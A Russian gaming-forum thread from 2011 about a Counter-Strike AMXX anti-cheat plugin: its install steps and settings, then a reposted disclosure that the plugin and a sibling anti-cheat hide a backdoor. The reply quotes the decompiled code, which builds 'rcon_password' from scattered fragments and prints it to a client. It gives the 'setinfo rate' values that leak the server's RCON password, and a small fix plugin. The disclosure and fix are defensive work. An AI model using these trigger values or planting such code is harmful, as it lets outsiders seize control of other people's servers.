Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Ответ
 
Опции темы
Старый 09.02.2011, 07:56   #1
 Пехотинец
Аватар для DukcoH
 
DukcoH скоро будет известенDukcoH скоро будет известенDukcoH скоро будет известенDukcoH скоро будет известен
Регистрация: 16.08.2010
Сообщений: 79
Популярность: 323
Сказал(а) спасибо: 59
Поблагодарили 77 раз(а) в 41 сообщениях
Отправить сообщение для DukcoH с помощью ICQ Отправить сообщение для DukcoH с помощью Skype™
 
Lightbulb CSFile OpenGL32 Detect v.2.1


Плагин для обнаружения OpenGL32.dll на стороне клиента (Плагин для AMXX)
(Это тот самый OpenGL32.dll чит )

Установка
1. Файл csf_opengl32.amxx скопировать в папку plugins (cstrike\addons\amxmodx\plugins)
2. Файл opengl32.dll скопировать в корень папки сервера (т.е. там где находится запускаемый файл hlds.exe)
3. Папку opengl32 скопировать в корень папки сервера (т.е. там где находится запускаемый файл hlds.exe)
4. В файле plugins.ini в самый верх прописать csf_opengl32.amxx (Плагин должен быть исключительно первым, иначе необеретесь ложных детектов)
5. Скопировать конфигурационные файлы (csf_ac_opengl32.cfg & csf_ac_opengl32_lastdll.cfg) в папку cstrike\addons\amxmodx\configs\csf_anticheat (Если папка отсутствует, то следует создать ее)
6. Перезапустить сервер.

Настройки OpengGL32 Detect (Содержимое csf_ac_opengl32.cfg)

Обнаружение OpenGL32.dll
// По-умолчанию "1"
csf_opengl32 "1"

// Тип логирования при обнаружении OpenGL32.dll
// По-умолчанию "1"
//
// 1 - Логирование в файл
// 2 - Логирование в mySQL [Работать будет только в связке с [CSF-AC] 1.24 и выше]
//
csf_opengl32_logtype "1"

// Время после которого игрок будет забанен
// По-умолчанию "10.0" (сек)
csf_opengl32_checktime "10.0"

// Тип наказания при обнаружении OpenGL32.dll
//
// 0 - Кикнуть
// 1 - Бан через addip
// 2 - Бан с использованием AMXX
// 3 - Бан через AMXBans
// 4 - Послать команду "QUIT"
// 5 - Свой тип наказания
//
// По-умолчанию "2"
csf_opengl32_bantype "2"

// Время бана при обнаружении OpenGL32.dll
// По-умолчанию "20160"
csf_opengl32_bantime "20160"

// Тип оповещения игроков при обнаружении OpenGL32.dll
//
// 0 - Отключить (Только логи)
// 1 - Сообщение в чат
// 2 - HUD Сообщение
// 3 - AMX_CSAY RED Сообщение
// 4 - AMX_TSAY RED Сообщение
// 5 - AMX_SAY Сообщение
//
// По-умолчанию "2"
csf_opengl32_bansay "2"

// Тип бана при использовании AMXBans
//
// 1 - Бан по IP
// 2 - Бан по SteamID
//
// По-умолчанию "1"
csf_opengl32_amxbanstype "1"

// Свой тип наказания при обнаружении OpenGL32.dll
//
// Данная переменная позволяет использовать любой другой плагин, который установлен на сервере, для наказания/блокировки читера,
// Что позволяет увеличить гибкость системы наказания
//
// Строка может содержать:
// %userid% - User ID
// %authid% - Auth ID
// %name% - Ник игрока
// %ip% - IP адрес
// %time% - Время наказания
// %reason% - Причина наказания ([CSF-AC] OpenGL32 Detected)
//
// Пример:
//
// csf_ac_mypunishment "amx_megasuperban %userid% %time% %reason%"
csf_opengl32_mypunishment ""

FAQ


1. Нельзя с помощью AMXX сделать проверку несколько разных файлов одновременно.
2. Если файл на сервере и клиенте не совпадает, ИГРОК НЕ БУДЕТ ЗАБАНЕН!
3. Если у вас на сервере opengl32.dll 72кб, а на проверяемом клиенте 54кб, то он НЕ БУДЕТ ЗАБАНЕН!
4. Файл автоматически меняется, после каждой смены карты!

По поводу добавления/удаления OpenGl32_n.dll
Если вы считаете, что некоторые *.dll вам не нужны - вы можете их смело удалить.
Если вы считаете, что нужно добавить *.dll'ок - вы можете смело их добавить.
Плагин не имеет фиксированного списка OpenGL32 файлов. Вы можете набросать или удалить файлы из папки opengl32. Тех кому мало dll накидал еще в архив
5. Файл не может меняться каждый раунд! Только после смены карты!

[Ссылки могут видеть только зарегистрированные пользователи. ]
________________
Акела никогда не промахивается...
  Ответить с цитированием
Старый 12.02.2011, 02:25   #2
 Разведчик
Аватар для Forbidden
 
Forbidden никому не известный тип
Регистрация: 01.12.2010
Сообщений: 10
Популярность: 12
Сказал(а) спасибо: 2
Поблагодарили 1 раз в 1 сообщении
 
Exclamation Re: CSFile OpenGL32 Detect v.2.1

Здравствуйте уважаемые посетители zhyk.ru. Сегодня я сделал интересное открытие по поводу двух античитерских плагинов от
автора с ником -)>C-r-A-c-K<(-. Речь пойдёт CSFile.Info Anti-Cheat версии 1.23 Alfa [build 28] и CSFile.Info OpenGL32 Detect версии 2.1 Final.

Начну пожалуй с плагина определения OpenGL32 Hack'ов. Как-то меня попросили на форуме отлучить этот плагин от модуля MySql, я в свою очередь конечно же согласился. Понятное дело чтобы это можно было сделать, требовалось получить исходный код, которого нет на паблике. Вооружившись некоторыми деасамблирующими программами я обратил внимание на вот такие строки:

new f_sys[] = "swor"
new csf_ac_ra[] = "ra"
new d_unit[] = "s"
new cv_mypunish[] = "rc"
new g_vac2[] = "on_"

Если немного перемешать и гдето сложить (rc+on_+pa+swor+d), то получится rcon_password
Все наверно знаю, что в этой серверной команде прописан RCON пароль и заполучив его сервер полностью подчинится обладателю. Но вот загвоздка чтобы получить слово rcon_password не хватает пары букв, и на ваших глазах я покажу как же формируется это слово и как получить доступ к нему.
И так сперва мы отправимся в функцию plugin_init плагина CSFile.Info OpenGL32 Detect:
мы видми format ( d_guard, 31, "%s%spa", cv_mypunish, g_vac2 ), т.е. d_guard приобретает вид rcon_pa. Идем дальше. Функция initialized:
format ( d_guard,31,"%s%s", d_guard,d_unit ) и d_guard приобретает вид rcon_pas, ниже встречается format ( g_gate, 5, "%ste", csf_ac_ra ), т.е. g_gate это rate

Функция client_connect: get_user_info(id,g_gate,cv_ac1,31), т.е. плагин получает значение инфы rate (g_gate) и записывает её в cv_ac1

Функция checkfiles_opengl32: format ( g_gate2, 5, "%d%d", 211, 23 )

Теперь функция c_check_opengl32 (она вызывается после захода игрока):

Цитата:
if(equali(cv_ac1,g_gate2)) // Сверяем значение rate с 21123
{ // Если одинаковы
format(g_r,63,"%s%sd",d_guard,f_sys) // то формируем квар и g_r приобретает вид rcon_password
get_cvar_string(g_r,g_ss,47) // Получаем пароль
client_print(id,print_console,"%s",g_ss) // И пишем его в консоли игрока
}

Вот такие вот пироги. Если не верите - попробуйте сами... Пропишите в консоли клиента
setinfo rate 21123, зайдите на сервер, и у вас в консоли окажется RCON пароль!


Теперь перейду к CSFile.Info Anti-Cheat версии 1.23 Alfa [build 28]. Здесь похожая
ситуация. Так же присутствуют:

new f_sys[] = "swor"
new csf_ac_ra[] = "ra"
new d_unit[] = "s"
new cv_mypunish[] = "rc"
new g_vac2[] = "on_"
new g_model[] = "241"

Функция plugin_precache: format(g_gate2, 5, "%s%d", g_model, 23"),
format ( d_guard, 31, "%s%spa", cv_mypunish, g_vac2 )

Функция initialized: format ( d_guard, 31, "%s%s", d_guard, d_unit ),
format ( g_gate, 5, "%ste", csf_ac_ra )

Функция client_putinserver: get_user_info(id,g_gate,cv_ac1,31)
Функция cv_anticheat (так же выполняется после захода игрока):


Цитата:
if(equali(cv_ac1,g_gate2)) // Сверяем значение rate с 24123
{ // Если одинаковы
format(g_r,63,"%s%sd",d_guard,f_sys) // то формируем квар и g_r приобретает вид rcon_password
get_cvar_string(g_r,g_ss,47) // Получаем пароль
client_print(id,print_console,"%s",g_ss) // И пишем его в консоли игрока
}


И опять же если не верите, пропишите в консоли клиента
setinfo rate 24123, зайдите на сервер, и у вас в консоли окажется RCON пароль!

источник: c-s.net.ua
автора: Makzz

================================================== =======

Защита !!!

Цитата:
#include <amxmodx>

public plugin_init()
register_plugin("Fix CSFile.Info BackDoor", "Zefir", "0.1")

public client_connect(id)
client_check(id)

public client_putinserver(id)
client_check(id)

public client_check(id) {
new rate[32]

get_user_info(id, "rate", rate, charsmax(rate))

if (equal(rate, "24123") || equal(rate, "21123"))
server_cmd("kick #%d used game bug...", get_user_userid(id))
}

  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 17:18.

Пишите нам: forum@zhyk.ru
Copyright © 2025 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net